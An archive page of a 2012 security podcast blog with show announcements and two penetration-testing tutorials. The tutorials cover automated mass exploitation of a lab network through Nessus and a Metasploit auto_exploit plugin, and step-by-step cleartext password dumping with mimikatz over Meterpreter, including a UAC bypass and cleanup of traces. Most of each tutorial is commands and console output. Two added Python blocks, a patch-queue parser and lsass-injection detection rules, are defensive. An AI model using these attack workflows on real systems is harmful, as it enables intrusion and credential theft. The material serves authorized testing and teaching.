February 23, 2012

Episode 279 with Gene Kim and Doug Burks at 6PM ET tonight!

2/23/2012 noon UPDATE: Cancelled due to circumstances beyond our control (illness).

We'll make sure to reschedule for a later date!

Episode 279 of PaulDotCom Security Weekly will feature a special interview with Gene Kim, former CTO of Tripwire, and a special Guest Technical Segment with Doug Burks on Security Onion. Come participate in our IRC channel or sit back and enjoy it live via the link below:

NOTE: The video will play the most recent show up until we are live!

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or if you prefer, visit the Episode 279 show notes page.

- Paul Asadoorian, Larry Pesce, Jack Daniel, Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

February 22, 2012

PaulDotCom Security Weekly Episode 278

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Jeremiah Grossman Interview:

Episode 278 Show Notes

Episode 278 - Direct Audio Download (mp3)

Episode Hosts:

  • Paul Asadoorian, Host of Security Weekly and Stogie Geeks

  • Larry Pesce, Host of Hack Naked At Night

  • Darren Wigley, Host of Hack Naked At Night

  • John Strand, Host of Hack Naked TV

    February 16, 2012

    Nessus 5 Making My Pentesting Workflow Easier

    The recent release of Nessus 5 comes with several improvements, such as better filtering in policy creation, analysis and reporting, and a faster, lighter scanning engine. Of these new features, my favorite is the ability to filter when creating new policies and analyzing results. For a very long time I kept a handwritten list of plugin IDs that identified some of the most commonly found vulnerabilities that Metasploit covered, for use with nessuscmd in my engagements. Now the new filtering features let me select only those checks that cover vulnerabilities whose exploits are in exploit frameworks like Core Impact and CANVAS; one can also filter for remote or local exploits. In this blog post I will cover how to create a policy that covers all exploits found in Metasploit, both local and remote. We will start by logging in to the Nessus web interface and clicking on Policies.

    Once in Policies we click on Add to be brought to the following screen, where we can create one. We give the policy a name and a brief description and leave the rest as default:

    We go to the next section by clicking on Next. On this screen we can enter any credentials we may have, as well as NTLM hashes for Windows credentials in the password field, which allows enumerating local vulnerabilities that might be on the target:

    We now move to the plugin section by clicking on Next:


    We start by clicking on Disable All and then click on Add Filter to create a new filter for the plugins. We set the filter to Metasploit Exploit Framework, the action to "is equal to" and the value to true, then click on Save to apply the filter:

    To enable the plugins in each family, we click on the family name text, being careful not to click in the circle beside the name, and then click on Enable Plugins at the top of the plugin list.

    Now we click on Next then on Save to save the policy.

    Once saved we can use the nessus plugin from the console to connect to the scanner and use it from inside Metasploit. You can use the console in Armitage, MSFConsole or the one in Metasploit Community/Pro/Express to load the plugin for use:

    msf > load nessus
    [*] Nessus Bridge for Metasploit 1.1
    [+] Type nessus_help for a command listing
    [*] Successfully loaded plugin: nessus

    Once the plugin is loaded we can connect to the host that is running the Nessus server using the nessus_connect command and list the policies we have available to us with nessus_policy_list:

    msf > nessus_connect carlos:contasena@localhost ok
    [*] Connecting to https://localhost:8834/ as carlos
    [*] Authenticated
    msf > nessus_policy_list
    [+] Nessus Policy List
    [+]
    ID  Name                        Comments
    --  ----                        --------
    -1  External Network Scan
    -2  Internal Network Scan
    -3  Prepare for PCI DSS audits
    -4  Web App Tests
    6   Metasploit Exploits

    We can now use the policy to scan a network by giving the nessus_scan_new command the policy ID, a name for the scan and a target range:

    msf > nessus_scan_new 6 "contoso pentest" 192.168.1.1-241
    [*] Creating scan from policy number 6, called "contoso pentest" and scanning 192.168.1.1-241
    [*] Scan started.  uid is 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554

    We can monitor the status of the scan using the command nessus_scan_status:

    msf > nessus_scan_status
    [+] Running Scans
    [+]
    Scan ID                                               Name             Owner   Started            Status   Current Hosts  Total Hosts
    -------                                               ----             -----   -------            ------   -------------  -----------
    396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554  contoso pentest  carlos  11:53 Feb 16 2012  running  217            241
    [+]
    [*] You can:
    [+]         Import Nessus report to database :     nessus_report_get <reportid>
    [+]         Pause a nessus scan :             nessus_scan_pause <scanid>
    msf >

    Once we see that the scan is no longer running, we can find the report from the scan using the nessus_report_list command to see its name and ID:

    msf > nessus_report_list
    [+] Nessus Report List
    [+]
    ID                                                    Name             Status     Date
    --                                                    ----             ------     ----
    396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554  contoso pentest  completed  11:58 Feb 16 2012
    [*] You can:
    [*]         Get a list of hosts from the report:          nessus_report_hosts <report id>

    Now that we have the report ID we can import it, but first we must create a workspace to house the data so as to keep it separated from any other data we may already be housing in the Metasploit default workspace. We then use the nessus_report_get command to import the report:

    msf > workspace -a contoso
    [*] Added workspace: contoso
    msf > nessus_report_get 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554
    [*] importing 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554
    [*] 192.168.1.99
    [*] 192.168.1.241
    [*] 192.168.1.237
    [*] 192.168.1.235
    [*] 192.168.1.234
    [*] 192.168.1.230
    [*] 192.168.1.223
    [*] 192.168.1.2
    [*] 192.168.1.192
    [*] 192.168.1.156
    [*] 192.168.1.155
    [*] 192.168.1.154
    [*] 192.168.1.153
    [*] 192.168.1.146
    [*] 192.168.1.143
    [*] 192.168.1.134
    [*] 192.168.1.113
    [*] 192.168.1.109
    [*] 192.168.1.102
    [*] 192.168.1.100
    [*] 192.168.1.1
    [+] Done

    After the import you can look at the vulnerabilities found by using the vulns command:

    msf > vulns
    [*] Time: 2012-02-16 16:01:44 UTC Vuln: host=192.168.1.1 port=443 proto=tcp name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2012-02-16 16:01:37 UTC Vuln: host=192.168.1.2 port=111 proto=tcp name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2012-02-16 16:01:37 UTC Vuln: host=192.168.1.2 port=445 proto=tcp name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
    [*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=445 proto=tcp name=MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) refs=CVE-2008-4250,BID-31874,OSVDB-49243,IAVA-2008-A-0081,MSFT-MS08-067,CWE-94,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34477
    [*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=53 proto=tcp name=Nessus SNMP Scanner refs=NSS-14274
    [*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=445 proto=tcp name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
    [*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.100 port=59159 proto=tcp name=netstat portscanner (SSH) refs=NSS-14272
    [*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.102 port=62078 proto=tcp name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.109 port=62078 proto=tcp name=Nessus SYN scanner refs=NSS-11219
    .......

    Once we confirm that vulnerabilities were found we can use the auto_exploit plugin I wrote and updated for this blog post. It can be found at https://github.com/darkoperator/Metasploit-Plugins/blob/master/auto_exploit.rb; you just need to put a copy of it into ~/.msf4/plugins on your OS X/Linux host to be able to use it. We start by loading it and looking at the options of the vuln_exploit command, which will allow us to exploit the hosts found to be vulnerable:

    msf > load auto_exploit
    [*] auto_exploit plug-in loaded.
    [*] Successfully loaded plugin: auto_exploit
    msf > vuln_exploit -h
    OPTIONS:
        -f <opt>  Provide a comma separated list of IP's and Ranges to skip when running exploits.
        -h        Command Help
        -j <opt>  Max number of concurrent jobs, 3 is the default.
        -m        Only show matched exploits.
        -r <opt>  Minimum Rank for exploits (low, average,normal,good,great and excellent) good is the default.
        -s        Do not limit number of sessions to one per target.

    To launch the exploits found we just use the vuln_exploit command. This will analyze the vulnerabilities found and match them to modules in the framework, launching by default 3 exploits at a time, auto-configured with the best possible payload for the platform and limited to one session per host:

    msf > vuln_exploit
    [*] Generating List for Matching...
    [*] Matching Exploits (This will take a while depending on number of hosts)...
    [+] Matched Exploits:
    [+]     192.168.1.153 exploit/windows/smb/ms08_067_netapi 445 500
    [+]     192.168.1.113 exploit/windows/smb/ms08_067_netapi 445 500
    [+]     192.168.1.99 exploit/windows/smb/ms08_067_netapi 445 500
    [+]     192.168.1.192 exploit/windows/smb/ms08_067_netapi 445 500
    [+]     192.168.1.153 exploit/windows/dcerpc/ms03_026_dcom 135 500
    [+]     192.168.1.154 exploit/linux/samba/lsa_transnames_heap 445 400
    [+]     192.168.1.113 exploit/windows/smb/ms06_040_netapi 445 400
    [+]     192.168.1.153 exploit/windows/smb/ms04_011_lsass 445 400
    [+]     192.168.1.153 exploit/windows/smb/ms06_040_netapi 445 400
    [+]     192.168.1.153 exploit/windows/smb/ms05_039_pnp 445 400
    [+]     192.168.1.153 exploit/windows/smb/ms04_007_killbill 445 100
    [*] Running Exploits:
    [*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.153
    [*] Started reverse handler on 192.168.1.241:29271
    [*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.113
    [*] Automatically detecting the target...
    [*] Started reverse handler on 192.168.1.241:4643
    [*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.99
    [*] Started reverse handler on 192.168.1.241:14900
    [*] Automatically detecting the target...
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
    [*] We could not detect the language pack, defaulting to English
    [*] Selected Target: Windows 2003 SP2 English (NX)
    [*] Fingerprint: Windows 2000 - Service Pack 4 with MS05-010+ - lang:English
    [*] Selected Target: Windows 2000 Universal
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (752128 bytes) to 192.168.1.99
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (752128 bytes) to 192.168.1.153
    [*] Fingerprint: Windows XP - Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (752128 bytes) to 192.168.1.113
    [*] waiting for finishing some modules... active jobs: 3 / threads: 16
    [*] Meterpreter session 1 opened (192.168.1.241:14900 -> 192.168.1.99:1513) at 2012-02-16 12:54:23 -0400
    [*] Meterpreter session 2 opened (192.168.1.241:29271 -> 192.168.1.153:2709) at 2012-02-16 12:54:23 -0400
    [*] Meterpreter session 3 opened (192.168.1.241:4643 -> 192.168.1.113:4035) at 2012-02-16 12:54:23 -0400
    [*] waiting for finishing some modules... active jobs: 0 / threads: 19
    [*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.192
    [+]     Skipping 192.168.1.153 exploit/windows/dcerpc/ms03_026_dcom because a session already exists.
    [*] Started reverse handler on 192.168.1.241:15430
    [*] Running exploit/linux/samba/lsa_transnames_heap against 192.168.1.154
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
    [*] We could not detect the language pack, defaulting to English
    [*] Selected Target: Windows 2003 SP2 English (NX)
    [+]     Skipping 192.168.1.113 exploit/windows/smb/ms06_040_netapi because a session already exists.
    [*] Started reverse handler on 192.168.1.241:48452
    [+]     Skipping 192.168.1.153 exploit/windows/smb/ms04_011_lsass because a session already exists.
    [*] Creating nop sled....
    [+]     Skipping 192.168.1.153 exploit/windows/smb/ms06_040_netapi because a session already exists.
    [+]     Skipping 192.168.1.153 exploit/windows/smb/ms05_039_pnp because a session already exists.
    [+]     Skipping 192.168.1.153 exploit/windows/smb/ms04_007_killbill because a session already exists.
    [*] Trying to exploit Samba with address 0xffffe410...
    [*] Connecting to the SMB service...
    [*] Attempting to trigger the vulnerability...
    msf > [*] Sending stage (752128 bytes) to 192.168.1.192
    [*] Meterpreter session 4 opened (192.168.1.241:15430 -> 192.168.1.192:1597) at 2012-02-16 12:54:29 -0400

    We can now take a look at the sessions found using the sessions command:

    msf > sessions

    Active sessions
    ===============

      Id  Type                   Information                            Connection
      --  ----                   -----------                            ----------
      1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ CARLOS-CD652C1C  192.168.1.241:14900 -> 192.168.1.99:1513
      2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2KADV01       192.168.1.241:29271 -> 192.168.1.153:2709
      3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TEST-01BCDAF47C  192.168.1.241:4643 -> 192.168.1.113:4035
      4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DBSQL2K01        192.168.1.241:15430 -> 192.168.1.192:1597

    As you can see, combining the new filtering in Nessus 5 with the Nessus plugin and my auto_exploit plugin allows one to be less noisy and more tactical when it comes to exploitation. Hope you found this blog post informative and useful, as always.
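On the remediation side, the same Metasploit Exploit Framework flag travels with each finding in an exported .nessus (v2) report, so it can drive a patch queue. This is an added example, not code from the original post or from the Nessus or Metasploit projects; the sample report is constructed from the plugin IDs and names in the vulns listing above, and its severity values and the function names are assumptions.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample in .nessus v2 layout (not real scan output). Plugin IDs,
# names and references come from the vulns listing in the post; the severity
# values are assumptions made for this example.
SAMPLE_NESSUS = """<NessusClientData_v2>
 <Report name="contoso pentest">
  <ReportHost name="192.168.1.99">
   <ReportItem port="445" protocol="tcp" severity="4" pluginID="34477" pluginName="MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check)">
    <cve>CVE-2008-4250</cve>
    <exploit_framework_metasploit>true</exploit_framework_metasploit>
    <metasploit_name>Microsoft Server Service Relative Path Stack Corruption</metasploit_name>
   </ReportItem>
   <ReportItem port="445" protocol="tcp" severity="0" pluginID="10394" pluginName="Microsoft Windows SMB Log In Possible">
    <exploit_framework_metasploit>true</exploit_framework_metasploit>
    <metasploit_name>Microsoft Windows Authenticated User Code Execution</metasploit_name>
   </ReportItem>
  </ReportHost>
  <ReportHost name="192.168.1.2">
   <ReportItem port="445" protocol="tcp" severity="0" pluginID="10394" pluginName="Microsoft Windows SMB Log In Possible">
    <exploit_framework_metasploit>True</exploit_framework_metasploit>
    <metasploit_name>Microsoft Windows Authenticated User Code Execution</metasploit_name>
   </ReportItem>
   <ReportItem port="111" protocol="tcp" severity="0" pluginID="11219" pluginName="Nessus SYN scanner"/>
  </ReportHost>
  <ReportHost name="192.168.1.1">
   <ReportItem port="443" protocol="tcp" severity="0" pluginID="11219" pluginName="Nessus SYN scanner"/>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""


def metasploit_findings(nessus_xml):
    """Return every ReportItem that Nessus marks as having a Metasploit module."""
    findings = []
    for host in ET.fromstring(nessus_xml).iter("ReportHost"):
        for item in host.iter("ReportItem"):
            # The element is absent on most plugins; treat missing as "false".
            flag = (item.findtext("exploit_framework_metasploit") or "").strip().lower()
            if flag != "true":
                continue
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port", "0")),
                "plugin_id": item.get("pluginID"),
                "severity": int(item.get("severity", "0")),
                "module": item.findtext("metasploit_name", default=""),
                "cves": [c.text for c in item.findall("cve")],
            })
    # Highest severity first, then host and port, so the list reads as a queue.
    findings.sort(key=lambda f: (-f["severity"], f["host"], f["port"]))
    return findings


def patch_queue(findings, min_severity=1):
    """Map host -> plugin IDs of exploitable flaws at or above min_severity."""
    queue = defaultdict(list)
    for f in findings:
        if f["severity"] >= min_severity:
            queue[f["host"]].append(f["plugin_id"])
    return dict(queue)


def informational_hosts(findings):
    """Hosts matched only through severity-0 plugins (for example 10394, whose
    module needs valid credentials): review credential hygiene, not patches."""
    return sorted({f["host"] for f in findings if f["severity"] == 0})


if __name__ == "__main__":
    found = metasploit_findings(SAMPLE_NESSUS)
    for f in found:
        print(f["severity"], f["host"], f["port"], f["plugin_id"], f["module"])
    print("patch first:", patch_queue(found))
    print("credential review:", informational_hosts(found))
```

Splitting the severity-0 matches out matters because the Metasploit filter selects any plugin mapped to a module, including informational ones that describe a reachable service rather than a missing patch.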

    Dumping Cleartext Credentials with Mimikatz

    Ever have that moment where hashes just aren't good enough? Where you don't have time or power to brute force a 15 character NTLM password? Well, if you were able to dump hashes in the first place, then you've already achieved the necessary pre-requisites to dump the passwords in clear text. Yes... you read that correctly, clear text.

    A few days ago I was catching up on my Google Reader feed and ran into this great post on pentestmonkey.net about a tool called mimikatz. ... Great blog by the way. I highly recommend it. ... It got me thinking, "This technique works great locally, but what would it take to get it working remotely via meterpreter?" And off I went to play.

    First, the usual setup, remote meterpreter on a Windows 7 box.

    root@EyeHakUNow:~# msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.1.15 E
    payload => windows/meterpreter/reverse_tcp
    lhost => 192.168.1.15
    [*] Started reverse handler on 192.168.1.15:4444 
    [*] Starting the payload handler...
    [*] Sending stage (752128 bytes) to 192.168.1.14
    [*] Meterpreter session 1 opened (192.168.1.15:4444 -> 192.168.1.14:51968) at 2012-02-15 20:42:15 -0500
    

    The first thing I tried was using the meterpreter 'execute' command to launch the local mimikatz binary in memory on the remote host. Unfortunately, mimikatz relies on external files to function, so this failed. A quick fail, but we still have options. One being old-fashioned upload and execute. I uploaded the mimikatz binary and necessary dependencies using the meterpreter 'upload' command...

    meterpreter > cd \
    meterpreter > mkdir temp
    Creating directory: temp
    meterpreter > cd temp
    meterpreter > upload /root/tools/mimikatz/x64/mimikatz.exe .
    [*] uploading  : /root/tools/mimikatz/x64/mimikatz.exe -> .
    [*] uploaded   : /root/tools/mimikatz/x64/mimikatz.exe -> .\mimikatz.exe
    meterpreter > upload /root/tools/mimikatz/x64/sekurlsa.dll .
    [*] uploading  : /root/tools/mimikatz/x64/sekurlsa.dll -> .
    [*] uploaded   : /root/tools/mimikatz/x64/sekurlsa.dll -> .\sekurlsa.dll
    meterpreter > ls
    
    Listing: C:\temp
    ================
    
    Mode              Size    Type  Last modified              Name
    ----              ----    ----  -------------              ----
    40777/rwxrwxrwx   0       dir   2012-02-15 20:43:11 -0500  .
    40777/rwxrwxrwx   0       dir   1980-01-01 00:00:00 -0500  ..
    100777/rwxrwxrwx  657392  fil   2012-02-15 20:43:03 -0500  mimikatz.exe
    100666/rw-rw-rw-  265200  fil   2012-02-15 20:43:12 -0500  sekurlsa.dll
    

    ...dropped to a shell, and executed mimikatz. I was able to access the mimikatz console, but when I tried to inject into the lsass process, I received what appeared to be a permissions error. It was hard to tell since all application output and documentation is written in French. More on this later. One of two things was stopping me: either I didn't have enough privileges, or UAC was getting in the way. I began working my way through the problem using trial and error. The first thing I tried was to get system level privileges.

    meterpreter > getsystem
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    

    Okay... plan 'B'. UAC must be the issue. I ran the 'bypassuac' post module.

    meterpreter > run post/windows/escalate/bypassuac 
    [*] Started reverse handler on 192.168.1.15:4444 
    [*] Starting the payload handler...
    [*] Uploading the bypass UAC executable to the filesystem...
    [*] Meterpreter stager executable 73802 bytes long being uploaded..
    [*] Uploaded the agent to the filesystem....
    [*] Sending stage (752128 bytes) to 192.168.1.14
    [*] Meterpreter session 2 opened (192.168.1.15:4444 -> 192.168.1.14:51969) at 2012-02-15 20:43:41 -0500
    [*] Session ID 2 (192.168.1.15:4444 -> 192.168.1.14:51969) processing InitialAutoRunScript 'migrate -f'
    [*] Current server process: pMTllsDttene.exe (2308)
    [*] Spawning notepad.exe process to migrate to
    [+] Migrating to 1128
    [+] Successfully migrated to process 
    

    Awesome, UAC bypassed. I jumped into the new session, dropped to a shell, loaded up the mimikatz console, and attempted the injection again.

    meterpreter > background
    msf  exploit(handler) > sessions -i 2
    [*] Starting interaction with 2...
    meterpreter > cd \
    meterpreter > cd temp
    meterpreter > shell
    Process 2444 created.
    Channel 1 created.
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\temp>mimikatz
    mimikatz
    mimikatz 1.0 x64 (alpha)	/* Traitement du Kiwi (Feb  9 2012 01:49:24) */
    // http://blog.gentilkiwi.com/mimikatz
    
    mimikatz # privilege::debug
    Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
    
    mimikatz # inject::process lsass.exe sekurlsa.dll
    PROCESSENTRY32(lsass.exe).th32ProcessID = 512
    Attente de connexion du client...
    Serveur connecté à un client !
    Message du processus :
    Bienvenue dans un processus distant
    			Gentil Kiwi
    
    SekurLSA : librairie de manipulation des données de sécurités dans LSASS
    
    mimikatz # @getLogonPasswords
    
    Authentification Id         : 0;129433
    Package d'authentification  : NTLM
    Utilisateur principal       : LaNMaSteR
    Domaine d'authentification  : WIN-8GLMSQD3GDE
    	msv1_0 : 	lm{ 00000000000000000000000000000000 }, ntlm{ d6ca08f8c9f57f208b4f746c3cf0d667 }
    	wdigest : 	reallygoodpassword
    	tspkg : 	reallygoodpassword
    ...
    mimikatz # 
    

    Holy crap! Is that a password in clear text? Yes... it is. In all its glory. Now you can do all of those great things you couldn't do with pass-the-hash... which isn't much. But it's just nice to see the password in clear text isn't it? I thought so.

    To rehash:
    1. Get shell.
    2. Bypass UAC.
    3. Upload binary and dependencies.
    4. Enter mimikatz console.
    5. Inject into lsass and pull creds.
    6. Exit mimikatz console.
    7. Clean up files and processes (details below).

    Some things to consider...

    1. Wdigest seems to be the main culprit here. Windows is storing the password to use for wdigest authentication. Interesting to think what else may be exploitable here. There very well may be a way to turn this off in the registry or security policy, but I have not explored it to that level yet. More to come perhaps.

    2. All of the documentation, and standard/error output of the program itself, is in French. I used Google Translate to read the documentation on the site, which was pretty garbled, but worked enough to make sense of the important details. In the comments on one of the author's blog entries, someone asked where the English version was and mentioned that the tool would get more attention if there was an English version. The author replied with something along the lines of, "What makes you think I want more attention?" Hopefully he doesn't mind the world's largest security blog writing about it...

    3. Don't forget to clean up after yourself. If you're uploading and executing, you're placing files on the remote filesystem. Make sure you delete them before you leave. Also, the 'bypassuac' post module makes a mess of processes on the remote system. You may want to clean those up before leaving too. The above steps consistently leave the following 8 new processes running in addition to the existing ones. 3 of them have randomly generated names. It's obvious which ones.

    evil.exe
    JMjFkkeww.exe
    conhost.exe
    tior.exe
    conhost.exe
    cmd.exe
    edMTUOe.exe
    notepad.exe
    

    4. Mimikatz comes packaged with psexec and works quite well with it. The downside is, you need to have credentials to use psexec in the first place.

    5. Wouldn't something like this make a great post module? Calling all Ruby devs!!!
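The steps above leave observable traces: a binary in C:\temp opening a remote thread in lsass.exe, lsass.exe loading sekurlsa.dll from outside the system directory, and a notepad.exe spawned for the 'migrate -f' step. Below is a sketch of matching those traces in Sysmon-style telemetry, added here as an example and not part of the original post; the events are constructed, and the rule names, the payload's Temp path and the trusted-directory list are assumptions.

```python
import ntpath

# Constructed Sysmon-style events (not captured telemetry). File names mirror
# the session in the post; the payload's Temp path is an assumption.
# EventID 1 = process create, 7 = image load, 8 = CreateRemoteThread.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\edMTUOe.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 8, "SourceImage": r"C:\temp\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 7, "Image": r"C:\Windows\system32\lsass.exe",
     "ImageLoaded": r"C:\temp\sekurlsa.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Windows\System32\lsass.exe",
     "ImageLoaded": r"C:\Windows\System32\wdigest.dll", "Signed": "true"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe"},
]

LSASS = "c:\\windows\\system32\\lsass.exe"
# Assumption: binaries under these prefixes are treated as expected locations.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _norm(path):
    """Windows paths are case-insensitive; compare in lower case."""
    return (path or "").lower()


def _trusted(path):
    return _norm(path).startswith(TRUSTED_DIRS)


def detect(events):
    """Return (event index, rule name) for each event matching a rule."""
    alerts = []
    for index, ev in enumerate(events):
        eid = ev.get("EventID")
        if eid == 8:
            # Thread created in lsass.exe by a binary outside trusted dirs.
            if _norm(ev.get("TargetImage")) == LSASS and not _trusted(ev.get("SourceImage")):
                alerts.append((index, "remote-thread-into-lsass"))
        elif eid == 7:
            # lsass.exe loading a DLL that is unsigned or from an odd path.
            unsigned = _norm(ev.get("Signed")) != "true"
            if _norm(ev.get("Image")) == LSASS and (unsigned or not _trusted(ev.get("ImageLoaded"))):
                alerts.append((index, "lsass-loaded-untrusted-dll"))
        elif eid == 1:
            # notepad.exe started by a parent outside trusted dirs, as when a
            # payload spawns a host process to migrate into.
            is_notepad = ntpath.basename(_norm(ev.get("Image"))) == "notepad.exe"
            if is_notepad and not _trusted(ev.get("ParentImage")):
                alerts.append((index, "notepad-from-untrusted-parent"))
    return alerts


def lsass_injection_confirmed(alerts):
    """Escalate only when both halves of the DLL injection were observed."""
    rules = {rule for _, rule in alerts}
    return {"remote-thread-into-lsass", "lsass-loaded-untrusted-dll"} <= rules


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for index, rule in hits:
        print(index, rule)
    print("escalate:", lsass_injection_confirmed(hits))
```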

    As always, enjoy! And join me for the following events!
    Boston, MA - SANS Security 542: Web App Penetration Testing and Ethical Hacking beginning May 7th.
    Toledo, OH - SANS Security 560: Network Penetration Testing and Ethical Hacking beginning March 26th!
    REGISTER TODAY FOR DISCOUNTS! Up to 50% on SEC560!

    Episode 278 with Jeremiah Grossman tonight at 6PM ET!

    Tonight will feature Mr. Web Security himself, the one and only Jeremiah Grossman, Founder and Chief Technology Officer of WhiteHat Security for Episode 278 of PaulDotCom Security Weekly. Come participate in our IRC channel or sit back and enjoy it live via the link below:

    NOTE: The video will play the most recent show up until we are live!

    For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or if you prefer, visit the Episode 278 show notes page.

    - Paul Asadoorian, Larry Pesce, Jack Daniel, Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

    February 14, 2012

    PaulDotCom Security Weekly Episode 277

    Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

    Adam Shostack Interview:

    Drunken Security News Weekly #277:

    Episode 277 Show Notes

    Episode 277 - Direct Audio Download (mp3)

    Episode Hosts:

  • Paul Asadoorian, Host of Security Weekly and Stogie Geeks

  • Larry Pesce, Host of Hack Naked At Night

  • John Strand, Host of Hack Naked TV

  • Carlos Perez, PaulDotCom Espanol

    February 10, 2012

    PaulDotCom Security Weekly Episode 276

    Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

    Joe Stewart on Malware Analysis:

    UPnP Hacking with Backtrack 5 & Python:

    Drunken Security News Weekly - #276:

    Episode 276 Show Notes

    Episode 276 - Part 1 - Direct Audio Download

    Episode 276 - Part 2 - Direct Audio Download

    Episode Hosts:

  • Paul Asadoorian, Host of Security Weekly and Stogie Geeks

  • Larry Pesce, Host of Hack Naked At Night

  • John Strand, Host of Hack Naked TV

  • Carlos Perez, PaulDotCom Espanol

    Hack Naked TV Episode 27

    In this edition we talk about Finger Zombies, Security Architecture, and the Foxconn attack.

    Links for this Episode:



    1. TrustWave.. WTH?

    2. UAC Fun

    3. FoxConn Hacked

    4. Offensive Countermeasures in Orlando!



    February 9, 2012

    Episode 277 with Adam Shostack tonight at 6PM ET

    Episode 277 of PaulDotCom Security Weekly will take us back to school with one of the authors of The New School of Information Security, Adam Shostack. Come participate in our IRC channel or sit back and be "schooled" live via the link below:

    NOTE: The video will play the most recent show up until we are live!

    For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or if you prefer, visit the Episode 277 show notes page.

    - Paul Asadoorian, Larry Pesce, Jack Daniel, Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

    February 3, 2012

    Hack Naked TV Episode 26

    In this episode we talk about Symantec. We introduce a very cool SpearPhishing tool (which is free), the VeriSign attack and we discuss RFID implications and microwave cooking directions for credit cards.

    Links for this Episode:



    1. New SpearPhishing tool

    2. VeriSign Hack

    3. RFID and Credit Cards.

    4. Offensive Countermeasures in Orlando!

